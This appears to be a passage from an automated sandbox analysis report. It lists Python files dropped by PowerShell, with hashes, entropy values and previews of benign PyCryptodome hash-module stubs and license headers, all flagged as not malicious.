                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):236
                                                                                                                                                                                                            Entropy (8bit):4.806129043337596
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:1REYB+1LWpVQ9zrIY3MTDyo5LwmLBysOL13yamLs/Ns:1REYBeh9vIY3YyoR3LB/Y3mLs1s
                                                                                                                                                                                                            MD5:9BB92F855E03ADD802DAF8AFD8D46DD4
                                                                                                                                                                                                            SHA1:2D8211D1408152634446F921611426687A6A8800
                                                                                                                                                                                                            SHA-256:B220806E584FF8FA9C4A28733F1A096B631B700096020EADCF766B96F86A82E7
                                                                                                                                                                                                            SHA-512:705206605980538F53A763410E8DB18EA03BBA2C204F8FDB2E723EB0EEBD9E1B252414D0EC2E092D46795E82BF61EA126B27CD40EFABC62BF6F0CD039313C43B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union....from .KMAC128 import KMAC_Hash....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. data: Buffer = ...,... mac_len: int = ...,.. custom: Buffer = ...) -> KMAC_Hash: .....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7392
                                                                                                                                                                                                            Entropy (8bit):4.848179526975703
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Nqrskrs9t3q/I86pj06gdE0Tq5/JPTZxl:krskrs9VqLwj0XzeL
                                                                                                                                                                                                            MD5:B8FF8687616746E7D2B33FA0EFC8DECE
                                                                                                                                                                                                            SHA1:32BA49FBF1FC3F036B99C2709515DC5ABC245C8B
                                                                                                                                                                                                            SHA-256:1F06117B8FB243148DA2689A76B39F88797D3A7A797A3363792D3D30D0FE06D0
                                                                                                                                                                                                            SHA-512:61C95FDB308FB6D2F822C5E1B9244D0583FDB636ABF47739492550C677D87DF9E7E28DF3B9CF051C565A5B93C946E13C974C3B4F0BA12541D6DDBC801C40E4C8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):588
                                                                                                                                                                                                            Entropy (8bit):4.505456264915036
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYB3vIY3vJ1ApWaNaFeLsQwRh72CX5BfWaNaFeLsXJaNi4j:1REcT3rA1Npuh717NpsENiS
                                                                                                                                                                                                            MD5:42C9FEC1BF1C0D408407E53932837C93
                                                                                                                                                                                                            SHA1:12F0171C79E934BF9202A864E6D87404EBDB1BDE
                                                                                                                                                                                                            SHA-256:4C18BD17FAE1D883D8710836B105100A6732AEF4639967F09FD1B7BD636E21B0
                                                                                                                                                                                                            SHA-512:9FC2C7FBFE0D15D327D6155DDB6613C1BDFC966E7BD2EC0D50CAE0DE981F5A1752B4A303EDFD9D87D68C7A0B2026E082B7F3DD3B40F8426B5CF9E0CF48A64723
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class K12_XOF(object):.. def __init__(self,.. data: Optional[Buffer] = ...,.. custom: Optional[bytes] = ...) -> None: ..... def update(self, data: Buffer) -> K12_XOF: ..... def read(self, length: int) -> bytes: ..... def new(self,.. data: Optional[Buffer] = ...,.. custom: Optional[bytes] = ...) -> None: .......def new(data: Optional[Buffer] = ...,.. custom: Optional[Buffer] = ...) -> K12_XOF: .....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6277
                                                                                                                                                                                                            Entropy (8bit):4.740289678626214
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:MwDqrYJALrYJHdt3EHGuIWHgkIx9LSVHSvtNz8iz1I7NHZDE3aOMz/fXqNagW6:9qrskrs9t3q/IN9L8i4NmKpfLI
                                                                                                                                                                                                            MD5:E481D6B8F9367485C21BE80F7EA069C9
                                                                                                                                                                                                            SHA1:3D3F67C2664934CF57C9705DBAC3B48A8DFF15B5
                                                                                                                                                                                                            SHA-256:2B2CB2D01B12395DDBEA6EC5D66E3CDC8FD5B99BCB81E112FE127299EE24922C
                                                                                                                                                                                                            SHA-512:3C215DF463DDAB0CE241F0898FF6005FC87C61E1249051876D05495AE3619569B18CB917AB9FEE194AFE73698CFCAFA4FC662617E22F17757063C978687B1B1C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):511
                                                                                                                                                                                                            Entropy (8bit):4.765158993873355
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYBjvIY3g2RypRyLu1AwLsQwu5LGLs+4Ls7Ry5Ryn:1REET3g2QEWAwL/0Lz4Lcwy
                                                                                                                                                                                                            MD5:4BC02D61022F9C16DF722B5F84952EE6
                                                                                                                                                                                                            SHA1:C1AC7927C7F367E0ED86236950DC2966326B127C
                                                                                                                                                                                                            SHA-256:3B3C9E78A4313AC9D7935D4AE92C650879BE8F55007478154429919B4794BB42
                                                                                                                                                                                                            SHA-512:9A6729A4346430DAB7D125D5575C955B968B2491F37C75F9ECE46A13A0DA794348F86227EC29A0D700CB5B66F76353D4372439D9EE956DFC43CEF75B62EA9251
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class MD4Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD4Hash: ..... def new(self, data: Buffer = ...) -> MD4Hash: .......def new(data: Buffer = ...) -> MD4Hash: .....digest_size: int..block_size: int..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6767
                                                                                                                                                                                                            Entropy (8bit):4.77561272659047
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:MwDqrYJALrYJHdt3EHGuIuyHgkIc+VpFfjlBPazI1i4a9m2gNeJ3JOMTRt/XklO/:9qrskrs9t3q/IuHJbD62itgGZ3FWtA
                                                                                                                                                                                                            MD5:815AD75FFCEB01DBC18A797BEB80D57E
                                                                                                                                                                                                            SHA1:90AEFD81B088EC63E771C502377380B5A83AAB0A
                                                                                                                                                                                                            SHA-256:26196B146E61C65278C91C066B7460FEBC3200DC14FB5E842C471E6D56C39783
                                                                                                                                                                                                            SHA-512:2025D72689B0A4CF2B1B30BAD9593DF40EB632C20628916F7141832930D6F42FEE3E79B951620A161B19213C18E4E5C1C5A1EC946B4F68E0911A9FB636D0E4ED
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):551
                                                                                                                                                                                                            Entropy (8bit):4.846633197285402
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYB3vIY3g2RypRyLu1AGR4Qwu5LgR4+OR47Ry5Ryn:1REcT3g2QEWAczQ/UYwy
                                                                                                                                                                                                            MD5:74AB60EEF22557EA93605E680CA5D294
                                                                                                                                                                                                            SHA1:6EE4291D7DB2B6787D18FC27DAD203ED326B3C3C
                                                                                                                                                                                                            SHA-256:0602DA2A342D9EF1F7C015F953B2DF27F51C25A5E99F89044E71579662EBA5FF
                                                                                                                                                                                                            SHA-512:F87B68B8145984213A2028813A82CD51C294D1A5D723DC92983662E24859EDFF25F5D608C2EC806BB052EC3BA8D8ABAB47C8047347C499FAE16833BB0A6CCC97
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class MD4Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD4Hash: ..... def new(self, data: Optional[Buffer] = ...) -> MD4Hash: .......def new(data: Optional[Buffer] = ...) -> MD4Hash: .....digest_size: int..block_size: int..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6802
                                                                                                                                                                                                            Entropy (8bit):4.584130593682968
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:dFQHvo7H1kIcKxYHSvtZzUwipIDwNHiw3aOMzCkDXXgcNdymaZ/HSxUY59Rk:bQHvLSrifNBKoknPDdzRk
                                                                                                                                                                                                            MD5:9B5CEA3FA09AFC6A601C87474223CF35
                                                                                                                                                                                                            SHA1:2D5EFB95669296497442EFBD696460F2049D3FA6
                                                                                                                                                                                                            SHA-256:5B3966F7457DB844BE069E442139F2863B2407D9C803EDCA064CE878BBD263E5
                                                                                                                                                                                                            SHA-512:3C989A5974DECE408C53EF69F45C4003DA506FE681C1196B29C7F9F5A4FC97264C39272952256BB7C8ACAFD9D2F7E783F815D8AD3E0AA97573F11103F13786A6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):511
                                                                                                                                                                                                            Entropy (8bit):4.765158993873355
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYBjvIY3IpRypRyLu1AwLsQwu5QlGLsIc4LsIJRy5Ryn:1REET3EQEWAwL/1LQ4Ljwy
                                                                                                                                                                                                            MD5:1F1147ECB293220FC948730F06836366
                                                                                                                                                                                                            SHA1:E467DEF3A20461383919E11A801E0B57BBDC85E6
                                                                                                                                                                                                            SHA-256:8A3E274302454BFF4450C1DF6DA89A048F13EB048E64C6781408F18066F8430B
                                                                                                                                                                                                            SHA-512:762332FFC8A79CEFABE74934DEBC2F101EB2BF66584765D21B8A3E21D0483F3AD2A18D60337573121A048588375D225A07F2698616B8227EDFF20FC95528A441
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class MD5Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD5Hash: ..... def new(self, data: Buffer = ...) -> MD5Hash: .......def new(data: Buffer = ...) -> MD5Hash: .....digest_size: int..block_size: int..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8291
                                                                                                                                                                                                            Entropy (8bit):4.581460307129591
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:vkJbFQHvo7EHgSrkIp2iliiM/QpkFLwZD42MzZFEtP2CTHOV:cJJQHv3ViiRM8Zszze+WOV
                                                                                                                                                                                                            MD5:041E76ED0853FC3D34926662B89C7EC9
                                                                                                                                                                                                            SHA1:C96F71E6A2A302C9A275F88FB524767D3953004C
                                                                                                                                                                                                            SHA-256:F837E4153ED4E178F518F71A87315C172C3B60CB4F132A6F19F68AF9BCA336F7
                                                                                                                                                                                                            SHA-512:9C6DF959510E2D2ABA4A9808E62288A74FE225911AFD854B85A8345A25131F352504F9176E3F290FC99A61B04E21A1C08531FF45D8CD3D348DEF74E70458B0D3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# Hash/Poly1305.py - Implements the Poly1305 MAC..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):689
                                                                                                                                                                                                            Entropy (8bit):4.617411626220112
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1Ro8s7REYBjvIY3wzRyaRyLu1Ac08UwEW5RwW0WFWXo84WLBh3Ls/y:1RM7CET32rEWAc0/W1WXo8xLB9LMy
                                                                                                                                                                                                            MD5:75346EDCB93D820A434DB03BE87622A5
                                                                                                                                                                                                            SHA1:47369DC52B3FAD5BF609908FB1AEACE8D87E2E01
                                                                                                                                                                                                            SHA-256:7DA8B1DB291F97F8751EBE26AAFB6663571467C4A13827F8114895990E3DD81A
                                                                                                                                                                                                            SHA-512:0F1CA6D6FCC2176B6F8FC7849CF5E14C77109CD92C690B81EC796F204ACADF69F3AD444F674EC3D751CAB4A959232F2BAF6D5E65D4BB174B1C5115A8EF413E1B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from types import ModuleType..from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class Poly1305_MAC(object):.. block_size: int.. digest_size: int.. oid: str.... def __init__(self,.. r : int,.. s : int,.. data : Buffer) -> None: ..... def update(self, data: Buffer) -> Poly1305_MAC: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: .......def new(key: Buffer,.. cipher: ModuleType,.. nonce: Buffer = ...,.. data: Buffer = ...) -> Poly1305_MAC: .....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1225
                                                                                                                                                                                                            Entropy (8bit):5.174131605423868
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:lcAXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/FbUgtQ+5VYGtQq+tQke:KIB0jcQHMsvI/S3oCFbn5DB+o
                                                                                                                                                                                                            MD5:CB30EA21F8B046CCE596D4E9D85D2C36
                                                                                                                                                                                                            SHA1:39A1CFA3C5664E638359F8EBB44CC8BE70D96125
                                                                                                                                                                                                            SHA-256:E811E75C7B6A01CDFAF40C3EF330BDAF01EDD45AAF449396A669EB1FF78C8CC6
                                                                                                                                                                                                            SHA-512:9DF776A64BE9A1C0405C29C3B5E41295EF558741F9695B6C968ECE87354099F12B490A1B125D0CF778992404F92ECF3C3DEFD854E9DB4C6B31B13C1B4ADEA5D9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):97
                                                                                                                                                                                                            Entropy (8bit):4.494398793678958
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:SbFQZmK2lfvo0NEr3Ssov+7Qt/ZTv:SbFsmK2lfWr3SsBktxTv
                                                                                                                                                                                                            MD5:37FCCB2128F28CB860905F19A5DE5664
                                                                                                                                                                                                            SHA1:E195627D9120B8DF358962BFE57EB1AF121510A7
                                                                                                                                                                                                            SHA-256:4E4A85E6BC544386180FAAB57B719D40C8B07D04FF1AD0A222AEDEFD81A29DD4
                                                                                                                                                                                                            SHA-512:A33C96C3A508D2C288E34036AD8F5748BC8993BC08D33785E554553E99A7E4818F853593E8D6695F4BA936B528748E96BF2969B616302F3B6AB4DBF7B08EBE6E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# This file exists for backward compatibility with old code that refers to..# Crypto.Hash.SHA....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6567
                                                                                                                                                                                                            Entropy (8bit):4.770780657565152
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:MwDqrYJALrYJHdt3EHGuIWHgkInaAHSvw5zbixIwNHZ3aOMmkXX4NUjfj:9qrskrs9t3q/IDJbiXN5KoknNP
                                                                                                                                                                                                            MD5:294D8E4BD1689A8559B935B6D234F5F1
                                                                                                                                                                                                            SHA1:23F0157DBFF6D5A4339E66FA0526C38CF3C91CB0
                                                                                                                                                                                                            SHA-256:CBCCB75E5F0647E5C18B743266D00300EEA5D15D164E3008ACBD934894A4AB43
                                                                                                                                                                                                            SHA-512:2D39E18D2C36E72B0CF236E7FFA0C37857B5EB5304CD96CFCBD214B5CA676AFA4A0C377C80C028163FAF53E9D7400E3598F4BD21C36DDD95AEE42A22BE657710
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):535
                                                                                                                                                                                                            Entropy (8bit):4.931502616073856
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYBjvIY33hUlRypRyLu1AwLsQwu5TUhGLs7Ug4Ls7UdRy5Ryn:1REET3RWQEWAwL/N/L+14L+ywy
                                                                                                                                                                                                            MD5:A9429F32C25E1E86987C94D3EE514342
                                                                                                                                                                                                            SHA1:176B307242F24A7BFF87D2A74EE609324AD26550
                                                                                                                                                                                                            SHA-256:84F643A25DF20E6A761AD4E1ECDC6F04493DB5CCAF6108254B944A31662A00E7
                                                                                                                                                                                                            SHA-512:2A7910E7C1091CC7F9F1D4993EF594F77B2E29841A2B64A702A53BFF6C7231B1224A63A9FC979117614547F699A0EA7864A5C622B083617A1AF316CD51AB1B79
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class RIPEMD160Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> RIPEMD160Hash: ..... def new(self, data: Buffer = ...) -> RIPEMD160Hash: .......def new(data: Buffer = ...) -> RIPEMD160Hash: .....digest_size: int..block_size: int..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1172
                                                                                                                                                                                                            Entropy (8bit):5.117383873972604
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:lcAXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/FbUgtj+tue:KIB0jcQHMsvI/S3oCFbnZ+B
                                                                                                                                                                                                            MD5:6C017EB81EF21818A9368CCC5143F50B
                                                                                                                                                                                                            SHA1:1D1229CDE4338C4BA3F969AF90700FC8960BBF08
                                                                                                                                                                                                            SHA-256:C86BAD9D4AFFEAC58CE3884195E177E1418721C8E3B70684ACDDC36E74BC943F
                                                                                                                                                                                                            SHA-512:5BF8D63655B09CAE49255FBCBAB152CAC1FF5E14FE5BAE2AA4221E6618E911FA0D5193743C82BB66473699D59974B9CE1633CA0DE68495B9CDF63FB947D2AD7F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165
                                                                                                                                                                                                            Entropy (8bit):4.73872569825065
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:SbFQZmK2lfvo0NEr3Ssov+7Qt/ZTzJmMkt/Z1oQpKGOIWufs/96Lf9:SbFsmK2lfWr3SsBktxTN+tx1xpdhVs/2
                                                                                                                                                                                                            MD5:0DE894DECF1A876B03938929070F04E5
                                                                                                                                                                                                            SHA1:DCB783EF505138E743F04546FD5A2D6C6A4840FB
